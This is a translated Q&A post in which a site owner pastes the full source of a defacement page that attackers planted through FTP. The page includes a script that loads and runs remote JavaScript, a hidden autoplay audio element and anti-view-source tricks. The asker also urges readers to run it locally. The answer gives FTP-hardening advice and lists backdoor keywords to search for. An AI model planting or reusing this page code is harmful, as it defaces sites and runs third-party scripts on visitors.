我网站的病毒问题

时间:2017-06-18 09:24:49

标签: php html5 security virus

这是一个严重的问题:我在自己的FTP服务器上发现了别人上传的HTML / PHP文件。我使用了强密码,但仍有人试图入侵我的服务器。这种情况已经发生过两次。

这些HTML / PHP页面的代码会显示"您的网站被黑了!",并且被上传到了我服务器的每个文件夹中。我删除了这些文件并上传了我的备份,但是否有什么安全措施可以阻止他人通过FTP注入文件,或者有什么FTP方面的安全建议?

下面贴出的是被上传到我文件夹中的那个HTML页面的代码。

出于安全考虑,我需要帮助。

注意:请复制此代码并在您的本地浏览器上运行,这样您就可以了解相关信息。

谢谢和问候, 文达



<!--    







                     ,        ,

                  /(        )`

                  \ \___   / |

              /- _  `-/  '

               (/\/ \ \   /\

               / /   | `    \

               O O   ) /    |

               `-^--'`<     '

              (_.)  _  )   /

               `.___/`    /

               `-----' /

        <----.     __ / __   \

        <----|====O)))==) \) /====

        <----'    `--' `.__,' \

               |        |

                \       /

            ______( (_  / \______

            ,'  ,-----'   |        \

            `--{__________)        \/





  root@0xaN0n:~# bash 0xaN0n.sh

  ~ <start>

  ~ Script by 0xaN0n | Garooda Security Squad

  ~ Mau copy?? Silahkan

  ~ Keep Support My Team [ Garooda Security Squad ]

  ~ https://www.facebook.com/groosec.go.id

  ~ https://0xaN0n.xyz

  ~ </start>

  root@0xaN0n:~# poweroff























  

-->



<html>

  <head>

    <title>Hacked by OTnaytrue</title>

    <link href='http://fonts.googleapis.com/css?family=Keania+One' rel='stylesheet' type='text/css'>

    <link REL="SHORTCUT ICON" href="https://s28.postimg.org/n5r1hjerh/bqc_LRGO2.png" />

    <meta property="og:image" content="https://s28.postimg.org/n5r1hjerh/bqc_LRGO2.png">

    <meta content="OTnaytrue - Garooda Security Squad" name="description">

    <meta content="Hacked by OTnaytrue" name="keywords">

    <meta content="Hacked by OTnaytrue" name="keywords">

    <meta content="Hacked by OTnaytrue" name="Abstract">

    <!-- Review note: this inline script runs only when the page is the top-level
         window (self==top). requestCfs() builds a URL on cfs2.uzone.id (using the
         page's own http/https scheme) that carries a fixed id/enc/params blob, a
         random number, document.domain and the screen width/height, then appends
         an async <script> element pointing at that URL to <head> (or <body>), so
         JavaScript served by that host is fetched and executed in this page's
         context. netbro_cache_analytics() defers the call via setTimeout(..., 0);
         sync() is defined but never called on this line.
         NOTE(review): the stray </body> right after </script>, inside <head>,
         suggests this snippet was spliced in separately from the rest of the
         template (presumably by a third party when the sample was fetched);
         unconfirmed. -->
    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKx%2fk%2f%2bUw0t0AH4no8FuNqZi9RYWWBQyQp0AHtS9VsumAX9UXmINwfamqfP%2bhBuKGBLUUYXicYjmM20YkqOwAdJtoE%2fcxyntKQyuef78x7ZyAufxf%2fOkm1Nd3J2AxD9NEpk%2bXHNkloX0VkcwNaQ3ob4ZiJdmouDyU0sPSjmnvjqC%2fKckHNj8n6eLy8IIIVVeZXvb9KSn%2blQdIwYra1LYGL3IeADYmd8A6Q7EDHQ5lXiiLjAJuuLlEYYgFWO4ePcQ0TONWgJAScS9jrRfCZp%2fIVRH7RzQb8zAZEjZjbRCnga%2fLZ2HDdgcWuhcFI5cpV5ya53ff3ebBBcFkk%2f7h46AW4Off4As9mJM0MAl%2fSFvgoxqQoipHdYLYkpq9aFVfDYpVd0bW4mG6VNsY5SgpLmsjOiG6syXGwKB5%2fTc%2fccCsvKOO%2fpZSnsyMYPXR6WiPVVebQs74v%2bC2UeVksLsErNCjJYCG7z362eknVYD9bhf5f4jFsgK4R79KrZs4PU%2fmgH5LB8%2fDLm9WMHHTUx6fSsJiNN4elM1ApjnAi" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

    <style>

      body {

        background: transparent;

        background: url(https://s23.postimg.org/za9vse2mj/IMG-20170525-_WA0009.jpg) no-repeat center center fixed;

        background-attachment: fixed;

        background-position: 50%;

        background-repeat: no-repeat;

        background-size: cover;

        text-shadow: grey 0px 0px 10px;

        height : auto;

        width : 100%;

        }

      

      #kiri {

        position: fixed;

        width: auto;

        left : 30px;

        text-shadow: grey 0px 0px 10px;

        text-decoration: none;

        }

      #kanan {

        position: fixed;

        float : right;

        margin: 0 40px 40px 530px;

        text-shadow: grey 0px 0px 10px;

        }

      .button {

         margin-top:50px; 

         padding:10px; 

         background-color:red; 

         color:#FFF;

         text-decoration: none;

         }

      .ntot {

        font size:8px;

        text-align: center;

        font-family: Pirata One;

        font-family: Keania One;

        text-shadow: 4px 4px 50px #000000;

        }

    </style>

  </head>

  <body>

    <div id="particles-js">

    <center>

      <div id=bar style="position: fixed; width: 100%; top: 0px; font-family: Tahoma; height: 20px; color: white; font-size: 13px; left: 0px; border-bottom: 2px solid darkred; padding: 0px; background-color: #000">

        <b>

        

          Garooda Security Squad - Eotnay@gmail.com

          

        </b>  

      </div>

      <br>

    </center>

    <div class="ntot">

    

      <br><br><br><br><br>

    

    <div id="kiri">

      <center>

        <a href="https://www.facebook.com/groosec.go.id"><img border="0" alt="0xaN0n" src="https://s28.postimg.org/n5r1hjerh/bqc_LRGO2.png" width="400" height="300"></a>

          <br><br><br><br>

        <a class="button" target="_blank" href="mailto:eotnay@gmail.com">Contact Me</a>

        &nbsp;&nbsp;

        <a class="button" target="_blank" href="https://www.facebook.com/groosec.go.id">  Find Me  </a>

      </center>

    </div>

    <div id="kanan">

      <br><br>

      <center>

        <font size="8" color="red">

        

        "Be Secure SIR "

        

      <br><br>

        <font size="6" color="white">

            

          OTnaytrue<font color="grey"> ft</font> Civilian 

            

        </font>

      <br>

        <font size="6" color="grey">

            

        [ Garooda Security Squad ]

            

      <br><br>

            

          .: We Are :.

            

        </font>

      <br>

        <font size="5" color="red">

            

          _MisterNotFound_ | 0xaN0n | PandaKecil | Mr.R007 | Mr.Z_4202 | cyber_xr00t | <font color="grey">Civilian </font>|

          Mr.404 |  Mr.RequestTimeOut | Dull_1999 | D!@m@nt3 | ins7ing | SyntaX404 | Mr.DarkNight |

          Rabbids404 | Mr.PHP404ERROR | <font color="grey">OTnaytrue</font> | AFK404 | MKNotfound477 | ./St4rXr4tS | GunshootCbr | HeartBeat

            

        </font>

      </center>

    </div>

    

    <DIV style="DISPLAY: none">

      <AUDIO controls="controls" autoplay="autoplay" loop="loop">

        <SOURCE type="audio/mpeg" src="http://www.topas-tv.com/config/skillet.mp3">

      </AUDIO>

    </DIV>

    </div>

    <script src="https://0xan0n.xyz/non/js/particles.js"></script>

    <script src="https://0xan0n.xyz/non/js/app.js"></script>

  </body>

  <footer>

    <center>

      <div id=bar style="position: fixed; width: 100%; bottom: 0px; font-family: Tahoma; height: 20px; color: white; font-size: 13px; left: 0px; border-top: 2px solid darkred; padding: 0px; background-color: #000">

        <b>

          

          Greetz : [ <marquee behavior="alternate" width="59%"><font color="red">Kakatoji  - ./bl4ckj4ck - Gadjah Mada - PURPLESM0KE - BerdendangC0de - 0xd3vs - IndoXploit  - Kedaong Crew -  TKJ Cyber Art  - Clown Hacktivism Team - Indonesia Defacer Tersakiti Team  -  Bima Cyber Team  -  T1KUS90T  -  IDCA - Garuda Security Hacker - And All Indonesian Defacer</font></marquee>]

          

        </b>

      </div>

    </center>

    </div>

  </footer>

    <!--[0xTrueCode-Brown anti copass Click kanan :V]--!>

 <script language=JavaScript>

// Text passed to alert() by the mouse-down and context-menu handlers in this script block.
var message="Ooops.. OTnaytrue Was Here";



//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

/**
 * Mouse-down handler for the legacy IE event model.
 *
 * Reads the global `event` object; when its `button` equals 2 (the right
 * button in that model) it shows the global `message` in an alert and
 * returns false. For any other button it returns undefined.
 */
function clickIE4(){
  var rightButtonPressed = event.button==2;
  if (!rightButtonPressed) {
    return;
  }
  alert(message);
  return false;
}



/**
 * Mouse-down handler for Netscape-style / DOM browsers.
 *
 * Acts only when `document.layers` is set, or when `document.getElementById`
 * exists and `document.all` does not. In that case a middle or right button
 * press (`e.which` equal to 2 or 3) shows the global `message` in an alert
 * and returns false. Every other path returns undefined.
 *
 * @param {Object} e - the mouse event; only `e.which` is read.
 */
function clickNS4(e){
  var handledBrowser = document.layers || (document.getElementById && !document.all);
  if (!handledBrowser) {
    return;
  }
  var button = e.which;
  if (button==2 || button==3) {
    alert(message);
    return false;
  }
}



// Attach the mouse-down handler that matches the detected legacy browser model:
// clickNS4 when document.layers exists (after enabling MOUSEDOWN capture),
// clickIE4 when document.all exists without document.getElementById.
if (!document.layers) {
  if (document.all && !document.getElementById) {
    document.onmousedown = clickIE4;
  }
} else {
  document.captureEvents(Event.MOUSEDOWN);
  document.onmousedown = clickNS4;
}

// Every context-menu request shows the alert and is cancelled (handler returns false).
// NOTE(review): the handler is compiled from a string via new Function, i.e. an
// eval-style construct.
document.oncontextmenu = new Function("alert(message);return false");

</script>

<script type='text/javascript'>

//<![CDATA[

/*
 * Minified keyboard-shortcut helper, followed by one registration.
 *
 * shortcut.add(a, b, c): a is the key combination string ("Ctrl+U" style, split
 *   on "+"), b the callback, c an options object. Options missing from c are
 *   filled from the defaults {type:"keydown", propagate:false,
 *   disable_in_input:false, target:document, keycode:false}; a string target is
 *   resolved with document.getElementById. The generated handler compares the
 *   pressed key and the ctrl/shift/alt/meta state with the combination; on a
 *   match it calls b(event) and, unless propagate is set, cancels bubbling and
 *   the default action. The handler is attached with addEventListener,
 *   attachEvent or an on<type> property and recorded in all_shortcuts.
 * shortcut.remove(a): drops the record for a and detaches its handler.
 *
 * `code` and `k` are assigned without a declaration, so they become implicit
 * globals.
 *
 * The trailing shortcut.add("Ctrl+U", ...) call makes Ctrl+U navigate the top
 * window to the Facebook URL given below. Ctrl+U is the view-source shortcut in
 * common browsers, so this presumably exists to keep visitors from reading the
 * page markup that way; it does not affect other ways of reading the file.
 */
shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var 
a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://web.facebook.com/OTnaytrue"});

//]]>

</script>

</html>

1 个答案:

答案 0 :(得分:0)

首先,您不应使用FTP,而应使用SFTP或至少使用FTPS。使用FTP,您的登录名和密码将通过网络以纯文本形式传输,供所有人查看。我相信您的提供商必须提供上述任一选项,如果没有,请将您的网站移至其他地方。

删除所有现有访问权限并使用强密码创建新访问权限。如果可以,请尝试使用公钥/私钥而不是密码进行ssh身份验证。

您的托管帐户可能支持设置双因素身份验证。如果可以,请启用它。

然后,就代码而言,请在您的文件中查找 eval、file_put_contents、fputs 等关键字(后门代码常用这些函数来执行代码或写入文件)。